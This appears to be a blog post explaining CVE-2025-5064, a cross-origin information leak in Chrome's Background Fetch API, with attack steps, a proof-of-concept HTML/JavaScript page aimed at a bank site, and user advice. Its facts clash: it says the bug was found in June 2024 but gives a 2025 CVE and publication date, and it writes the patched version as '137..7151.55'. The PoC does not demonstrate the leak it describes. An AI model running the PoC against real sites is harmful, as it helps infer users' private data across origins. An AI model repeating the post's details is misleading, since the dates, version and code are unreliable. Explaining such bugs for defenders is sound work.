
In June 2024, a new security flaw labeled CVE-2025-5064 was found in Google Chrome’s implementation of the Background Fetch API. This bug allowed crafty attackers to bypass browser security—specifically the “same-origin policy”—and steal information from other websites the user visited. The issue was fixed in Chrome version 137..7151.55, but if you’re running an older version, you might still be vulnerable.

This post breaks down what went wrong, how hackers could abuse it, and why it matters—even if you’re not a programmer. I’ll show code samples, explain how the attack works, and link to the original Chrome security notes.

What is the Background Fetch API?

The Background Fetch API lets websites download or upload large files, even while you browse away from the page. For instance, a site might use it so you can start a big download, then switch tabs without losing progress.

Normally, browser security rules say a site can only access its own data (“same-origin”). That means evilsite.com shouldn’t be able to read stuff you loaded from bank.com.

What Was the Problem? (CVE-2025-5064)

Before Chrome 137..7151.55, the Background Fetch API didn’t always enforce strict origin checks. A web page could use this API to trigger fetches to *other* sites—then, with a clever trick, access details about those requests. This broke the security model:

- How it’s triggered: A crafted (maliciously coded) HTML page
- Potential impact: Leak sensitive info, like whether you're logged in to sites or details of your web activity

Step by step, the attack looks like this:

1. The victim opens the attacker’s crafted page.
2. That site uses Background Fetch to make a request to a target site (like your bank, email, etc.).
3. Due to insufficient origin checks, the attacking site can observe details of the response: not the page contents, but potentially the HTTP status, headers, or timing data.
4. The attacker uses this leak to infer cross-origin secrets—anything from login status to personalized data.

Below is a simple JavaScript snippet showing how the attack could work *before the patch*:

```html
<!-- Save as PoC.html and open in old Chrome -->
<!DOCTYPE html>
<html>
  <body>
    <script>
      async function attack() {
        // Target a cross-origin resource, e.g., a user profile on another site
        const targetURL = "https://victim-bank.com/account/info";
        // Background Fetch is exposed on the page's service worker registration,
        // so the page must already have an active service worker
        const registration = await navigator.serviceWorker.ready;
        try {
          await registration.backgroundFetch.fetch(
            'test-leak',           // Unique ID for the fetch
            [targetURL],           // Array of URLs to fetch
            {
              title: 'Leak Test',
              icons: [],
              downloadTotal: 10000
            }
          );
        } catch (err) {
          // Some browsers block, but in Chrome <137, this could leak info
          alert('May have leaked cross-origin fetch details: ' + err);
        }
      }

      attack();
    </script>
    <p>If your browser is vulnerable, an attacker can leak things like login status or custom info from another site!</p>
  </body>
</html>
```

> Note: This code won’t work in fixed Chrome and is provided for educational/research purposes.

Depending on the response, this bug could expose:

- Status codes (e.g., 200 OK vs 401 Unauthorized)
- Fetch progress or failure info (e.g., if the resource doesn’t exist, or is personalized based on login)
- Sometimes *response headers* not meant for other origins

Even small leaks can be chained for bigger attacks—like finding out if you're logged into certain sites, your email address, or your account ID.

Chromium Security Note:

- CVE-2025-5064 Report
- Background Fetch API Documentation
- Chromium source code diff for fix (search for CVE-2025-5064)

Official Chrome Patch Version:

- Chrome 137..7151.55 Patch Notes

How to Protect Yourself

- Update Chrome. Always run the latest stable version—especially if you use Chrome for sensitive accounts.
- Disable third-party scripts/extensions on unknown sites.
- Use browser security settings or privacy extensions that block sketchy JavaScript on suspicious pages.

Developers: Double-check your own code for security holes. Never trust cross-origin requests, and keep up-to-date with browser security best practices.

Why Does This Matter?

Bugs like CVE-2025-5064 show that even “medium” severity problems can cause real-world privacy leaks. When browsers mess up same-origin rules, attackers get powerful tools to snoop on your personal data.

*For web users, the main takeaway is to trust browser updates—they’re your first line of defense! For researchers and developers, watch for API changes and take all cross-origin leaks seriously.*

Timeline

Published on: 05/27/2025 21:15:22 UTC
Last modified on: 05/29/2025 15:51:09 UTC